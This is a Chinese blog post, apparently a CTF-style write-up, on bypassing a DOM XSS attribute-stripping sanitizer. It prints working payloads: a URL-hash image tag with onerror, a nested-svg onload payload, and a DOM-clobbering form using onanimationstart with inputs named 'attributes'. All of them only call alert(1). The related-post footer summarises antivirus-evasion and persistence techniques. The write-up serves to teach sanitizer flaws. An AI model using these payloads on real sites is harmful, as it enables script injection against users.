一种错误的代码编写方式下的绕过,和修改后代码的绕过

于 2024-08-17 21:34:41 发布
阅读量198 收藏 4
点赞数 1
文章标签: javascript 安全 渗透 dom型xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141286026
版权

目录

错误的编码方式下的绕过

绕过例子

修改后

payload构造

dom破坏解法

错误的编码方式下的绕过

    const data = decodeURIComponent(location.hash.substr(1))
    root.innerHTML = data
//遍历root所有子元素,然后删除他们所有属性
    for(let el of root.querySelectorAll('*')){
        for (let attr of el.attributes) {
            el.removeAttribute(attr.name);
        }
    }

上述代码中删除属性时都是在同一个数组中操作,当你删除一个属性后,后面的属性会往前推一个。[a,b,c]当删除a元素后b元素往前推一个成这个样子了[b,c],但是要删除的还是1这个位置的元素,然后就把c删除了,但是b还是保留了下来,所以我们只需要在数组双数的位置进行注入就可以了

绕过例子

file:///D:/%E6%A1%8C%E9%9D%A2/code/01.html/test.html#%3Cimg%20aaa=%222%22%20src=%221%22%20df=%22123%22%20onerror=%22alert(1)%22%3E

修改后的代码的绕过

    const data = decodeURIComponent(location.hash.substr(1))
    root.innerHTML = data
//遍历root所有子元素,然后删除他们所有属性
    for(let el of root.querySelectorAll('*')){
        let attrs = [];
        for (let attr of el.attributes) {
            attrs.push(attr.name);
        }
        for (let name of attrs){
            el.removeAttribute(name);
        }
    }

payload构造

可以用下面代码,下面代码在删除前就会被执行

<svg><svg onload=alert(1)>

dom破坏解法

这个是借助下面这个特性

下面div有一个名为a的属性,然后获取这个属性,div下面又有两个标签id为img,获取id的a属性就会获取两个img标签

现在借助这个特性构造payload

file:///D:/%E6%A1%8C%E9%9D%A2/code/01.html/test.html#%3Cstyle%3E@keyframes%20x{}%3C/style%3E%3Cform%20style=%22animation-name:x%22%20onanimationstart=%22alert(1)%22%3E%3Cinput%20id=attributes%3E%3Cinput%20id=attributes%3E

上面payload中form有两个属性用来触发XSS,然后在这个道题中我们是用el.attrlbutes取值的时候,发现form下面有两个<input id=attribute>标签,然后就把这两个标签取出来了,然后就饶过了form用来xss注入的两个标签完成了注入,form的attribute就是两个input标签

板栗妖怪
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EAC反作弊绕过工具源代码_NP_dbd绕过eac_绕过np_绕过eac_np反作弊_
10-01
首先,EAC是一种广泛使用的反作弊解决方案,它通过监控游戏进程、内存扫描、网络数据包分析等方式,防止非法修改游戏数据和利用漏洞。EAC的主要功能包括检测内存篡改、阻止未授权的DLL注入以及防止网络通信被篡改。...
64位下绕过UAC源代码
04-28
"64位下绕过UAC源代码"正是针对这种情况的一个解决方案。 首先,了解UAC的工作原理至关重要。当一个程序尝试执行需要管理员权限的操作时,UAC会弹出一个权限提示窗口,要求用户确认是否允许操作。如果用户拥有管理...
汇编代码注入器,支持x64和x86
04-04
汇编代码注入器是一种在软件开发和逆向工程中广泛使用的工具,它允许开发者将汇编代码注入到正在运行的进程或系统中,以实现特定功能或进行调试。本文将围绕这个主题,详细讲解汇编代码注入器的原理、工作方式以及...
绕过PatchGuard 3
04-04
PatchGuard是微软在Windows内核中引入的一种安全机制,主要用于防止对系统核心组件的非法篡改,特别是针对64位Windows系统。它在Win2003、WinXP、Win64和Win32等平台上运行,以保护操作系统免受恶意软件和黑客攻击。...
SSLBypass:iOS SSL固定绕过(iOS 8-14)
03-19
3. 中间人攻击:理解中间人攻击的概念和实施方式,这是SSL绕过常见的安全威胁模。 4. Objective-C++编程:熟悉Objective-C++的基本语法和特性,能够阅读和修改项目源码。 5. 安全编程:学习如何在代码中实现安全...
vue2前端阿里云oss服务端签名直传
weixin_74285634的博客
08-13 253
generatePresignedUrlApi是由后端提供的接口 来获取密钥。
【vue教程】五. Vue 的路由管理
前端探索者
08-13 1095
Vue Router 是 Vue 官方的路由管理器,用于构建单页面应用。它允许你通过 URL 来映射不同的组件,实现页面的动态加载和导航。路由守卫用于在路由跳转前后执行代码,可以用来检查用户认证状态、获取数据等。通过本篇文章,我们学习了 Vue Router 的基本概念、配置和使用,以及如何实现动态路由和嵌套路由。我们还探讨了路由守卫的概念,并提供了如何在 Vue 组件中使用它们的示例。这些知识点将帮助你构建一个功能完备的单页面应用。
【无标题】
weixin_42348009的博客
08-14 163
静态方法返回一个由给定对象自身的可枚举的字符串键属性名组成的数组。
【Markdown】Markdown 中的语言简称
EleganceJiaBao的博客
08-12 989
以下是常见编程语言、脚本语言、标记语言等在 Markdown 中的语言简称以及相应的示例:
playwright链接本地浏览器,实现自动登录。
qq_38880880的博客
08-12 181
代码】playwright链接本地浏览器,实现自动登录。
Vue中的路由与多种守卫常见问题及解决方案
zhaochen1127的博客
08-12 1129
Vue Router中的路由守卫主要分为三种类:全局守卫、路由独享守卫和组件内守卫。全局守卫:作用于整个应用,包括beforeEach和afterEach。路由独享守卫:在路由配置中直接定义,只有进入该路由时才会触发,如。组件内守卫:定义在组件内部,包括和。路由守卫是Vue Router中一个强大的功能,能够帮助开发者在路由跳转前后执行重要的逻辑判断。然而,不当的使用和配置可能会引发一系列问题,如无限循环、守卫逻辑错误、守卫未正确触发以及异步处理不当等。
Vue 中 app.config 相关配置项介绍与案例
前端基地
08-13 1041
本博文展开了细致且全面的阐述,对 app.config 、app.config.errorHandler 、app.config.warnHandler 、app.config.performance 、app.config.compilerOptions 、app.config.globalProperties 以及 app.config.optionMergeStrategies 进行了深入剖析。不仅清晰明了地介绍了它们的功能和特性,还通过丰富多样的实际案例展开了详尽的分析。
高级java每日一道面试题-2024年8月12日-网络篇-说一下JSONP的实现原理?
qq_43071699的博客
08-12 614
JSONP是一种非官方的跨域数据交换协议,它允许在网页中通过标签的src属性从其他域名(网站)安全地获取数据。由于浏览器的同源策略限制,直接通过Ajax等方式跨域请求数据通常是不被允许的,而JSONP则巧妙地绕过了这一限制。
基于vue框架的NBA球星管理系统1878g(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
08-12 1019
随着互联网的普及和体育产业的蓬勃发展,篮球运动在全球范围内拥有庞大的粉丝群体,NBA(美国职业篮球联赛)作为其中的佼佼者,其球星更是备受关注。传统的球星信息管理方式往往依赖于纸质文档或简单的电子表格,这种方式不仅效率低下,难以实现数据的即时更新与共享,也无法满足球迷和媒体对球星信息深度挖掘的需求。因此,开发一套基于Vue框架的NBA球星管理系统,通过信息化手段整合球星信息,实现数据的快速录入、存储、查询与分析,对于提升管理效率、满足用户需求具有重要意义。,处理前端请求并提供业务逻辑。
ECMAScript6中的模块:export导出、import导入
pan_junbiao的博客
08-12 892
早期的 JavaScript 程序很小,通常被用来执行独立的脚本任务,在 Web 页面中需要的地方提供一定的交互。随着 Web 应用程序变得越来越复杂,有必要考虑提供一种JavaScript 程序拆分为可按需导入的单独模块的机制,这就是模块化编程。模块化编程就是将一个复杂的程序根据一定的规则封装成一个或多个文件,并组合在一起。使用这种方式,可以将代码分解到多个文件中,每个文件都称为一个模块。一个模块通常是一个类或者多个函数组成的方法库。
uni-app 安卓禁用侧滑返回/虚拟返回(vue3 hook)
行如逆水行舟,不进则退
08-12 195
[TOC](uni-app 安卓禁用侧滑返回/虚拟返回(vue3 hook))
《零散知识点 · Vue-admin 模板项目》
山人行
08-12 839
permission.js 里面的:const whiteList = [‘/login’] // 不重定向白名单配在route里面的顶部即可。this获取方式:提示:{{this.$route.params.alert}}提示:{{this.$route.query.alert}}
基于vue框架的爱看电影网站v4o92(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
最新发布
h2345678的博客
08-15 828
项目功能:用户,电影分类,电影信息,电影评分基于Vue框架的爱看电影网站项目功能丰富多样,旨在为用户提供一个集电影浏览、信息查询、观影体验、互动交流于一体的综合性平台。
NVDLA专题4:具体模块介绍——Convolution DMA
fangfanglovezhou的博客
08-14 556
NVDLA专题4:具体模块介绍——Convolution DMA
python自启动 绕过360_记录一次绕过杀软的过程
06-10
首先,需要注意的是,绕过杀软是一种不道德的行为,同时也是违法的。因此,我们不鼓励或支持这种行为。 其次,关于Python自启动,一般有两种方法: 1. 将Python脚本添加到系统的启动项中。这样,每次开机启动时,系统会自动运行这个脚本。具体步骤如下: - 打开“运行”窗口,输入“shell:startup”,打开启动文件夹。 - 右键点击文件夹中的空白处,选择“新建”->“快捷方式”。 - 在“快捷方式”的目标栏中输入“python.exe 脚本路径”,如“C:\Python27\python.exe D:\test.py”。 - 点击“下一步”,输入一个名称,如“test”,点击“完成”即可。 2. 使用Windows任务计划程序。这样,可以设置脚本在指定的时间自动运行。具体步骤如下: - 打开“控制面板”->“管理工具”->“任务计划程序”。 - 在任务计划程序中,右键点击“任务计划程序库”,选择“创建任务”。 - 在“常规”选项卡中,输入一个名称和描述,选择“不管用户是否登录都要运行”,勾选“使用最高权限运行”。 - 在“触发器”选项卡中,选择“新建”,设置计划的触发条件,如每天、每周等。 - 在“操作”选项卡中,选择“新建”,设置操作为“启动程序”,输入“python.exe 脚本路径”。 - 点击“确定”保存任务。 对于绕过杀软的过程,一般有以下几种方法: 1. 使用FUD(Fully Undetectable)技术,将病毒代码加密或混淆,使其难以被杀软检测到。 2. 使用虚拟机或沙箱环境,在其中运行病毒代码,以避免被杀软检测。 3. 修改病毒代码,使其不再具有病毒行为,从而不被杀软检测到。 4. 手动编写病毒代码,使用未被杀软识别的技术和方法。 需要注意的是,这些方法都存在风险和不道德性质,因此不应该轻易尝试。同时,杀软的主要目的是保护用户安全,因此绕过杀软的行为也可能会对用户造成风险和危害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值